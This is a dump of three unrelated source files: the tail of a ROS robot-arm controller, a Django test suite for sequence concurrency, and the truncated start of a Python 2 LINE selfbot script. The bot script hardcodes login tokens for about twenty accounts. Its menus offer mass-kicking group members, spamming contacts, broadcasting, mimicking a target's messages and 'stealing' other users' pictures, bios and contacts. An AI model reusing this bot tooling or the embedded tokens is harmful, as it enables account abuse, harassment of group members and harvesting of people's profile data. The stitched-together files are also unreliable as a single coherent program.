if req.command == '1':
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.enableGroup(65)
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.loginfo('TOOK TOO LONG FOR MC TO RESPOND ')
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
motion_status.clear()
return stx_manager_serviceResponse(
'Operating the robot has NOT been Enabled - MC has not responded in reasonable time')
motion_status.clear()
return stx_manager_serviceResponse("Operating the robot from 'moveit_node' has been Enabled")
if req.command == '0':
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.disableGroup(65)
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.loginfo('TOOK TOO LONG FOR MC TO RESPOND ')
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
motion_status.clear()
return stx_manager_serviceResponse(
' Operating the robot has NOT been Disabled - MC has not responded in reasonable time')
motion_status.clear()
return stx_manager_serviceResponse(" Operating the robot from 'moveit_node' has been Disabled")
else:
return stx_manager_serviceResponse('Error: wrong input')
def signal_handler(signal, frame):
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.disableGroup(65)
tn.disconnect()
# let all other threads to exit before main thread
rospy.sleep(1)
print("Exiting: main thread - signal handler...")
return
def create_and_put_in_dictionary(key, success_func, abort_func, is_immediate):
my_msg = MsgState(key, success_func, abort_func, is_immediate)
my_mutex.acquire()
msg_state_dictionary[str(key)] = my_msg
my_mutex.release()
def start_listening_thread():
try:
while 1:
# if no action from MC for CLEAN_TABLE_TIMEOUT seconds-> clean the msg dictionary
signal.alarm(CLEAN_TABLE_TIMEOUT)
ans = tn.recv()
update_msg_state(ans)
except Exception as e:
print("EXITING: listener thread...")
def update_msg_state(msg):
immediate_ack_time = int(round(time.time() * 1000))
is_differed = False
parsed_ans = msg.split(" ")
msg_id = parsed_ans[0]
if msg_id[0] == '!':
is_differed = True
msg_id = msg_id[1:]
# if a msg from mc is 'Fault' event
if msg_id[0] == '#':
rospy.loginfo(msg)
msg_err_code = parsed_ans[1].split("\r\n")[0]
my_object = msg_state_dictionary[msg_id]
my_object.is_differed = is_differed
my_object.err_code = msg_err_code
if my_object.dead:
return
if not is_differed:
my_object.immediate_ack_time = immediate_ack_time
motion_status.set()
if my_object.is_immediate and my_object.success_callback is not None:
my_object.success_callback()
if msg_err_code != '0':
for error in error_dict:
if error["number"] == msg_err_code:
rospy.logerr(error["message"])
rospy.loginfo("EXIT SYSTEM - use 'Ctl+C'")
# if differed we call the Success/Fail callback
else:
if msg_err_code == '0':
rospy.loginfo("SET SUCCESS CALLBACK IS CALLED!")
my_object.success_callback()
motion_status.set()
else:
for error in error_dict:
if error["number"] == msg_err_code:
rospy.logerr(error["message"])
rospy.loginfo("EXIT SYSTEM - use 'Ctl+C'")
rospy.loginfo("SET FAIL CALLBACK IS CALLED!")
my_object.fail_callback()
motion_status.set()
def clean_dictionary(signum, frame):
"""called when read times out"""
keys = []
rospy.loginfo("Cleaning dictionary!!!")
for key in msg_state_dictionary:
msg = msg_state_dictionary[key]
if msg.dead:
keys.append(key)
else:
if msg.is_immediate or msg.is_differed:
keys.append(key)
else:
time_from_ack = int(round(time.time() * 1000)) - msg.immediate_ack_time
time_from_creation = int(round(time.time() * 1000)) - msg.creation_time
if time_from_ack > D_TIME_OUT or time_from_creation > I_TIME_OUT:
keys.append(key)
keys_no_duplicates = list(dict.fromkeys(keys))
my_mutex.acquire()
for key in keys_no_duplicates:
del msg_state_dictionary[key]
my_mutex.release()
rospy.loginfo("Dictionary is clean!!!")
if __name__ == '__main__':
try:
signal.signal(signal.SIGALRM, clean_dictionary)
signal.signal(signal.SIGINT, signal_handler)
rospy.init_node('arm_controller')
rospy.loginfo('stx_controller_arm/gripper_Running_tcp.............')
print("=====================================")
MC_IP = rospy.get_param('~MC-IP')
print('Stx controller use ip : {}'.format(MC_IP))
ROBOT_SPEED = rospy.get_param('~ROBOT-SPEED')
print('robot SPEED is : {}'.format(ROBOT_SPEED))
print("=====================================")
tn = BasicClient(MC_IP)
tn.connect()
# create a hash map: key(MC msg id) value(msg state object)
msg_state_dictionary = dict()
# create an error dictionary from json
mypath = os.path.join(os.path.dirname(__file__), 'stxlib/error_codes.json')
with open(mypath, 'r') as errors:
error_dict = json.load(errors)
t_MC_response = threading.Thread(target=start_listening_thread)
t_MC_response.start()
server_arm = StxControllerServerArm()
server_gripper = StxControllerServerGripper()
service = rospy.Service('Stx_manage_client_command', stx_manager_service, handle_service_command)
rospy.spin()
tn.disconnect()
except rospy.ROSInterruptException:
pass
except Exception as e:
print("Exiting: main thread - exception...")
|
tests.py
|
import threading
import time
from django.db import OperationalError, connection, transaction
from django.test import TestCase, TransactionTestCase
from . import get_next_value
class SingleConnectionTestsMixin(object):
def test_defaults(self):
self.assertEqual(get_next_value(), 1)
self.assertEqual(get_next_value(), 2)
self.assertEqual(get_next_value(), 3)
def test_sequence_name(self):
self.assertEqual(get_next_value('cases'), 1)
self.assertEqual(get_next_value('cases'), 2)
self.assertEqual(get_next_value('invoices'), 1)
self.assertEqual(get_next_value('invoices'), 2)
def test_initial_value(self):
self.assertEqual(get_next_value('customers', initial_value=1000), 1000)
self.assertEqual(get_next_value('customers', initial_value=1000), 1001)
self.assertEqual(get_next_value('customers'), 1002)
class SingleConnectionInAutocommitTests(SingleConnectionTestsMixin,
TransactionTestCase):
pass
class SingleConnectionInTransactionTests(SingleConnectionTestsMixin,
TestCase):
pass
class ConcurrencyTests(TransactionTestCase):
def assertSequence(self, one, two, expected):
actual = []
thread_one = threading.Thread(target=one, args=(actual,))
thread_two = threading.Thread(target=two, args=(actual,))
thread_one.start()
thread_two.start()
thread_one.join(timeout=1)
thread_two.join(timeout=1)
self.assertEqual(actual, expected)
def test_first_access_with_commit(self):
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value()
output.append(('one', value))
time.sleep(0.2)
output.append(('one', 'commit'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value()
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 1),
('two', 'begin'),
('one', 'commit'),
('two', 2),
('two', 'commit'),
]
self.assertSequence(one, two, expected)
def test_later_access_with_commit(self):
get_next_value()
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value()
output.append(('one', value))
time.sleep(0.2)
output.append(('one', 'commit'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value()
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 2),
('two', 'begin'),
('one', 'commit'),
('two', 3),
('two', 'commit'),
]
self.assertSequence(one, two, expected)
def test_first_access_with_rollback(self):
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value()
output.append(('one', value))
time.sleep(0.2)
transaction.set_rollback(True)
output.append(('one', 'rollback'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value()
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 1),
('two', 'begin'),
('one', 'rollback'),
('two', 1),
('two', 'commit'),
]
self.assertSequence(one, two, expected)
def test_later_access_with_rollback(self):
get_next_value()
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value()
output.append(('one', value))
time.sleep(0.2)
transaction.set_rollback(True)
output.append(('one', 'rollback'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value()
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 2),
('two', 'begin'),
('one', 'rollback'),
('two', 2),
('two', 'commit'),
]
self.assertSequence(one, two, expected)
def test_first_access_nowait(self):
def one(output):
with transaction.atomic():
value = get_next_value()
output.append(('one', value))
time.sleep(0.5)
connection.close()
# One might expect an OperationalError here, but PostgreSQL doesn't
# appear to report an error in this case.
def two(output):
time.sleep(0.1)
with transaction.atomic():
value = get_next_value(nowait=True)
output.append(('two', value))
connection.close()
expected = [
('one', 1),
('two', 2),
]
self.assertSequence(one, two, expected)
def test_later_access_nowait(self):
get_next_value()
def one(output):
with transaction.atomic():
value = get_next_value()
output.append(('one', value))
time.sleep(0.5)
connection.close()
def two(output):
time.sleep(0.1)
with self.assertRaises(OperationalError):
with transaction.atomic():
value = get_next_value(nowait=True)
output.append(('two', value)) # shouldn't be reached
output.append(('two', 'exc'))
connection.close()
expected = [
('one', 2),
('two', 'exc'),
]
self.assertSequence(one, two, expected)
def test_first_access_to_different_sequences(self):
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value('one')
output.append(('one', value))
time.sleep(0.2)
output.append(('one', 'commit'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value('two')
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 1),
('two', 'begin'),
('two', 1),
('two', 'commit'),
('one', 'commit'),
]
self.assertSequence(one, two, expected)
def test_later_access_to_different_sequences(self):
get_next_value('one')
get_next_value('two')
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value('one')
output.append(('one', value))
time.sleep(0.2)
output.append(('one', 'commit'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value('two')
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 2),
('two', 'begin'),
('two', 2),
('two', 'commit'),
('one', 'commit'),
]
self.assertSequence(one, two, expected)
|
yudi25.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token="EnvQXVzt3IgL2QvxUgz8.pIfscrd8L4dj1jrbrT2fca.lJOK5Qp8g5KnPMCGvZnKxlyBqwaWvtTjiWQiHJoch54=")#1
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token="EnJHnzZtcLZy08jUudr8.6aZTpsG37MxD+MqNsJxP6a.pZsWL5U6ieTsZrFJuMXnf7QpspabSy9KaU1zGy6VO6I=")#2
ki.loginResult()
kk = LINETCR.LINE()
#kk.login(qr=True)
kk.login(token="EnAj23Jh8RuJPIj8gSR2.AZs3a8Vf+ipnhLTOmQbtuG.IMP3CkWJzbWurJzxISj1C93pJEV6ekIPia+yceUIGDY=")#3
kk.loginResult()
kc = LINETCR.LINE()
#kc.login(qr=True)
kc.login(token="EnJ6mjXHY2IGs6R9n1Hf.TxpN+3FqpfVz0URVVjPPxW.zUTh0PiZgXO1pQY7kHa5tn8g8AHT5ivC1FqRLTsiIGc=")#4
kc.loginResult()
ks = LINETCR.LINE()
#ks.login(qr=True)
ks.login(token="En6QESR7hoEmT4F3A2m4.DPUJL7N9FlH3q14qZJ5r5a.SwCLojcGrkvRGB2rzgPJH+k0P5UD2C+PLy3yzCRF51I=")#5
ks.loginResult()
k1 = LINETCR.LINE()
#k1.login(qr=True)
k1.login(token="EnlG4y1876rJ6k4O0WL4.+Bc/Zlua/rxta3RDE9Qfra.GhjAQy9dGlOPyMu05Y9wgNRDI7UHt1VnAiVViGHAnlY=")#6
k1.loginResult()
k2 = LINETCR.LINE()
#k2.login(qr=True)
k2.login(token="EnYglmuDtOrrZzCz5MO8.0LFAw+X66CVCLF7PSB30Qa.DFXqp/uBBHSQcIdpf+7vfq0VJXWCuqqfh72ZNnvYMlA=")#7
k2.loginResult()
k3 = LINETCR.LINE() #
#k3.login(qr=True)
k3.login(token="EntaZG1XY2EgVxbuAaW1.hm/n508o500AIsyh+lXvmq.USXhhYC0Dnh9OwOHUaI6QC1Lh4ZoAyQcHqBblMyLSao=")#8
k3.loginResult()
k4 = LINETCR.LINE() #
#k4.login(qr=True)
k4.login(token="EninnKrHFUpBOMgFrCk8.5Gss6Cj7IBEXrUFBawm9oa.U7zxbe6DD9P52hXLGWwjloGINuKlQWHpUtgSsDB063g=")#9
k4.loginResult()
k5 = LINETCR.LINE() #
#k5.login(qr=True)
k5.login(token="EnDBX2qdv1CbyWyEdyu1.F998qotUGTGQIRjcj/3fKq.XNkXIlffqqlmRBkRmQdvcDUXRiO0GAo/+A65lF/HHO0=")#10
k5.loginResult()
k6 = LINETCR.LINE()
#k6.login(qr=True)
k6.login(token="EnJKHSdZ0pIVQ9vpYAQ3.SO/fObQ10CshHFFY0L3meW.UQV56fkXVTk1uRO0pSsbGDJDA8TUy12Vzmj0ThBRowk=")#1
k6.loginResult()
k7 = LINETCR.LINE()
#k7.login(qr=True)
k7.login(token="Enw3Vyivaalra403LERd.rOli1dtiBis50MI658yqRq.CAnS9i55O0J7/qLZf/LIS8yd+i1KSh2PH1tQcSOy8Oo=")#2
k7.loginResult()
k8 = LINETCR.LINE()
#k8.login(qr=True)
k8.login(token="EnCifPd5Tc5F3u7mO0i0.JAwaMojSWCnrhb405Gw7Sa.QwIMdNcSvc7UuHJ93FL3Kn2neKfmEC3eNN6gG+FxPE8=")#3
k8.loginResult()
k9 = LINETCR.LINE()
#k9.login(qr=True)
k9.login(token="EndK1JKkdpl9wB4gdbm2.kJj6gKL1avGlp7iF9MY8KG.j2RsigIr9LP7KfOeJLgjSA1R9u40UwdzjsuP0KV36pk=")#4
k9.loginResult()
k10 = LINETCR.LINE()
#k10.login(qr=True)
k10.login(token="En9TOIUfE2WyoXCD7l74.hz3BUHBhWs9y9M66OUsVXa.FQoVihfIMAP3no25MwO2PT2uRbmzkuYxymaFCShtoPo=")#5
k10.loginResult()
k11 = LINETCR.LINE()
#k11.login(qr=True)
k11.login(token="EnTzqSIB5hpjSjaUXzp6.zbzLgObFSJIgQgJQvcBBPG.44vY/TL5s+Bypu87rQuExKc+8yR59AOcV0H4OL92bCI=")#6
k11.loginResult()
k12 = LINETCR.LINE()
#k12.login(qr=True)
k12.login(token="EncFq0IWEPEwmOWUObK4.4tpKgyQpvX03tq+Nc2O81a.s675l1+/7PZ2hznoDuH4FWmjYE4rvWiAAp4qelq9IP0=")#7
k12.loginResult()
k13 = LINETCR.LINE()
#k13.login(qr=True)
k13.login(token="En6cLAnzmzMLxf8Tn8s5.I5/VTy4nlTo0SUVhFfe6Xq.IV5c4LHKA6bR4k1ziZKaxf+c7hwG1Pt7jPByl5UXRtA=")#8
k13.loginResult()
k14 = LINETCR.LINE()
#k14.login(qr=True)
k14.login(token="EnKKOa3cbKeriUPg4jK8.gyJ7IyLouRfMg9Euqk50Ma.yiGw+8VE6ShqL2u5aca3ggjfdxnAxnniBFztlqbi2Lg=")#1.5b
k14.loginResult()
k15 = LINETCR.LINE()
#k15.login(qr=True)
k15.login(token="EnmCVqYbfGO5u0LGIGaf.xJUtYDt++RBi3klp87+xlW.7z6zZWPf9TK93MVvKHs2UbhP6zJGBB6BmjMraqmOIE8=")#gondrong
k15.loginResult()
k16 = LINETCR.LINE()
#k16.login(qr=True)
k16.login(token="EnnFGK6AknxF1NDDwMJ5.WVIB6Th9FuqOpB9Iw2XUbq.DSooi371J9gM1ZH+q0DHPzsxfIEEszoz8jUXF2IFZVA=")
k16.loginResult()
k17 = LINETCR.LINE()
#k17.login(qr=True)
k17.login(token="En9wjOwk4ToKaOjF5I87.8DHCNR+5ggo//QiQT7pj9W.FpXmtdVYvp/060ecr0WUr+FGOnRHwy7lbbdBfusxg7g=")
k17.loginResult()
k18 = LINETCR.LINE()
#k18.login(qr=True)
k18.login(token="En3FJnEXtlHEqSKeZf74.eKVQczIDnmzo80Nf0AhV1a.GAVz8CghCWtpTlGJXU5rgRYkEVaust9sS0Klv/1E6d0=")
k18.loginResult()
k19 = LINETCR.LINE()
#k19.login(qr=True)
k19.login(token="EnBE2HmeIFFfM91ZTaX7.25Cn7zT2U0ATdXa1ZX81LW.IbylRjW82hYufs9i/2yOn5xZIqx/U4RsDgqs1s+Twmc=")#1.2
k19.loginResult()
k20 = LINETCR.LINE()
#k20.login(qr=True)
k20.login(token="En4MSMmqBVw9S5nHq9J4.FUQk+BmD8RC8M0fTjjKnDa.k0xznzgTbCrl24foktcYx23YKrGljzkdg4KYZm4zhJ4=")#1.2
k20.loginResult()
satpam1 = LINETCR.LINE() #
satpam1.login(token="En9ziqocK4BfIGXWJAvf.h7/acorCwJWn0bikcs3GJW.OzgPssOBQsT+ewcOWpxW6RhhKjWCVnSXYRH5bnp286Y=")#satpam
#satpam1.login(qr=True)
satpam1.loginResult()
k19 = k20 = k18
print "login success bos"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
+-------------
¦ ? =====[WAHYUDI]===== ??t ?
¦-------------
¦ Owner : ? =====[WAHYUDI]===== ?
¦-------------
¦ ?]·?·Menu For Public·?·[?
¦+------------
¦¦[•]Help
¦¦[•]Key
¦¦[•]Mimin
¦¦[•]Creator
¦¦[•]Time
¦¦------------
¦¦[•]Say....
¦¦[•]Wkwkwk/Wkwk/Wk
¦¦[•]Hehehe/Hehe/He
¦¦[•]Galau
¦¦[•]You
¦¦[•]Hadeuh
¦¦[•]Please
¦¦[•]Haaa
¦¦[•]Lol
¦¦[•]Hmmm/Hmm/Hm
¦¦[•]Welcome
¦¦[•]Woy
¦¦------------
¦¦[•]Wiki
¦¦[•]Lyric
¦¦[•]Instagram
¦¦[•]Music
¦¦[•]Youtube
¦¦[•]Vidio
¦¦------------
¦¦[•]Bc
¦¦[•]Up
¦¦[•]Berapa besar cinta
¦¦[•]Apakah
¦¦[•]Siapakah cewek
¦¦[•]Siapakah cowok
¦¦[•]Adakah
¦¦[•]Cakepkah
¦¦------------
¦¦[•]T-eng
¦¦[•]T-japan
¦¦[•]T-thai
¦¦[•]T-id
¦+------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
+-------------
"""
Keyowner ="""
+-------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
¦-------------
¦ Owner : ? =====[WAHYUDI]===== ?
¦-------------
¦ ?]·?·Menu For Admin·?·[?
¦+------------
¦¦[•]Kick ...
¦¦[•]Invite (by mid)
¦¦[•]Undang (Invite by kontak)
¦¦[•]Tarik/Jepit (Invite by kontak)
¦¦[•]Adminlist
¦¦[•]Bot Add @
¦¦[•]Spam... (spam on 10 tes)
¦¦[•]Bot? (cek kontak bot)
¦¦[•]Cancel (cncl undngn trtunda)
¦¦[•]clean invites
¦¦[•]clear invites
¦¦------------
¦¦[•]Message change:...
¦¦[•]Message add:...
¦¦[•]Message
¦¦[•]Comment:...
¦¦[•]Add comment:...
¦¦------------
¦¦[•]Jam on/off
¦¦[•]Change clock
¦¦[•]Jam Update
¦¦------------
¦¦[•]Status (cek status room)
¦¦[•]Cctv
¦¦[•]Intip
¦¦[•]Toong
¦¦[•]Nk
¦¦[•]Tajong
¦¦[•]Vkick
¦¦[•]Emak/Abah
¦¦[•]Kill
¦¦[•]Absen/Respon
¦¦------------
¦¦[•]Ifconfig
¦¦[•]System
¦¦[•]Cpu
¦¦[•]Kernel
¦¦[•]Debug speed
¦¦[•]Bot speed
¦¦[•]Speed respon
¦¦[•]Sp turunin
¦¦[•]Sp naikin
¦¦[•]Turun lagi
¦¦[•]Spbot
¦¦[•]Sp asli
¦¦[•]Speedbot
¦¦[•]Speed
¦+------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
+-------------
"""
Setgroup ="""
+-------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
¦-------------
¦ Owner : ? =====[WAHYUDI]===== ?
¦-------------
¦ ?]·?·Menu For Admin·?·[?
¦+------------
¦¦[•]Cancel
¦¦[•]Buka qr/Open qr
¦¦[•]link open
¦¦[•]Tutup qr/Close qr
¦¦[•]link close
¦¦[•]Rejectall (reject semua invite)
¦¦[•]Protect:hight/low
¦¦[•]Auto blockqr:off/on
¦¦[•]Namelock:on/off
¦¦[•]Blockinvite:on/off
¦¦[•]Joinn on/off (kick protect join)
¦¦[•]Cancel on/off(cncl all undngan)
¦¦[•]Qr on/off (protect qr)
¦¦[•]Contact On/off
¦¦[•]Join on/off (auto join bot)
¦¦[•]Gcancel:on/off (invite grup)
¦¦[•]Leave on/off
¦¦[•]Share on/off
¦¦[•]Add on/off
¦¦[•]Cancelall (canccel all invite)
¦¦[•]Comment off/on
¦¦[•]Backup:on/off
¦¦[•]Mode on
¦¦------------
¦¦[•]Info Group
¦¦[•]ginfo
¦¦[•]Group id
¦¦[•]TL:....
¦¦[•]Gn
¦¦[•]LG
¦¦[•]LG2
¦¦[•]group list
¦¦------------
¦¦[•]My mid
¦¦[•]Mid Bot
¦¦[•]Bot restart
¦¦[•]Turn off bots
¦¦[•]Allbio: (ganti bio stat bot)
¦¦[•]Myname: (ganti nama bot)
¦¦------------
¦¦[•]Banlist
¦¦[•]Cek ban
¦¦[•]Kill ban
¦¦[•]Blacklist @
¦¦[•]Banned @
¦¦[•]Mid @"
¦¦[•]Unban @
¦¦[•]Ban
¦¦[•]Unban
¦¦------------
¦¦[•]Steal group pict
¦¦[•]Steal cover @
¦¦[•]Midpict:..
¦¦[•]Steal pict
¦¦[•]Steal bio
¦¦[•]Steal mid
¦¦[•]Steal contact
¦¦[•]Mimic on/off
¦¦[•]Targetlist
¦¦[•]Mimic target
¦¦[•]Target @
¦¦[•]Del target @
¦¦[•]copy @
¦¦[•]Backup
¦¦------------
¦¦[•]Spamcontact @
¦¦[•]GBc
¦¦[•]Pm cast
¦¦[•]Bot like
¦¦------------
¦¦[•]moleh
¦¦[•]Kabur all
¦¦[•]Kabur
¦¦[•]Bot kadieu
¦¦[•]Asupka:
¦¦[•]Invite me
¦¦------------
¦¦[•]Remove all chat
¦¦[•]Admin add @ (by tag)
¦¦[•]Admin remove @
¦¦[•]Cleanse
¦¦[•]Ready op
¦¦[•]Greet
¦+------------
¦??Hanya Utk Owner/Admin??
¦-------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
+-------------
"""
KAC=[cl,ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15,k16,k17,k18,k19,k20]
DEF=[ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15,k16,k17,k18,k19,k20]
kicker=[satpam1]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = ks.getProfile().mid
Emid = k1.getProfile().mid
Fmid = k2.getProfile().mid
Gmid = k3.getProfile().mid
Hmid = k4.getProfile().mid
Imid = k5.getProfile().mid
Jmid = k6.getProfile().mid
Kmid = k7.getProfile().mid
Lmid = k8.getProfile().mid
Mmid = k9.getProfile().mid
Nmid = k10.getProfile().mid
Omid = k11.getProfile().mid
Pmid = k12.getProfile().mid
Qmid = k13.getProfile().mid
Rmid = k14.getProfile().mid
Smid = k15.getProfile().mid
Tmid = k16.getProfile().mid
Umid = k17.getProfile().mid
Vmid = k18.getProfile().mid
Wmid = k19.getProfile().mid
Xmid = k20.getProfile().mid
Smid1 = satpam1.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,Kmid,Lmid,Mmid,Nmid,Omid,Pmid,Qmid,Rmid,Smid,Tmid,Umid,Vmid,Wmid,Xmid]
induk=["u6b34b703cbc5fc83cd1e5b6832a05352"]
Creator=["u3e21520910fc9780c9d4944146dd8508","u6b34b703cbc5fc83cd1e5b6832a05352"]
admin=["u3e21520910fc9780c9d4944146dd8508","u6b34b703cbc5fc83cd1e5b6832a05352","ub573e7ff77d03c5bd9d2eaefbc9a695f",mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,Kmid,Lmid,Mmid,Nmid,Omid,Pmid,Qmid,Rmid,Smid,Tmid,Umid,Vmid,Wmid,Xmid] #Krisna,kris,
owner=["u3e21520910fc9780c9d4944146dd8508","u6b34b703cbc5fc83cd1e5b6832a05352"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"""?erima Kasih Sudah Menambahkan Aku Jadi Teman
» ? =====[WAHYUDI]===== ??t ? Bot Protect «
>>? ? =====[WAHYUDI]===== ??t ? ?<<
» ? =====[WAHYUDI]===== ??t ? «
» SelfBot «
????????? ??:
? ? =====[WAHYUDI]===== ??t ? ?
? ? =====[WAHYUDI]===== ??t ? ?
? ? =====[WAHYUDI]===== ??t ? ?
Idline: http://line.me/ti/p/yudi_std02""",
"lang":"JP",
"comment":"??aµt?l??€ By??\n?º°°°?? t?a? ? =====[WAHYUDI]===== ??t ? ??º°°°?(^?^)\naµt?l??€ by yudi ??? »»» http://line.me/ti/p/yudi_std02 «««",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"namelock":True,
"Backup":False,
"AutoKick":True,
"Mimic":False,
"pname":True,
"qr":True,
"Protectgr":True,
"Protectjoin":False,
"Protectcancl":True,
"protectionOn":True,
"Protectcancel":True,
"winvite":False,
"winvite2":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
profile = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
profile = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
profile = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
profile = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
profile = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k1.getProfile()
backup = k1.getProfile()
profile = k1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k2.getProfile()
backup = k2.getProfile()
profile = k2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k3.getProfile()
backup = k3.getProfile()
profile = k3.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k4.getProfile()
backup = k4.getProfile()
profile = k4.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k5.getProfile()
backup = k5.getProfile()
profile = k5.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k6.getProfile()
backup = k6.getProfile()
profile = k6.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k7.getProfile()
backup = k7.getProfile()
profile = k7.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k8.getProfile()
backup = k8.getProfile()
profile = k8.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k9.getProfile()
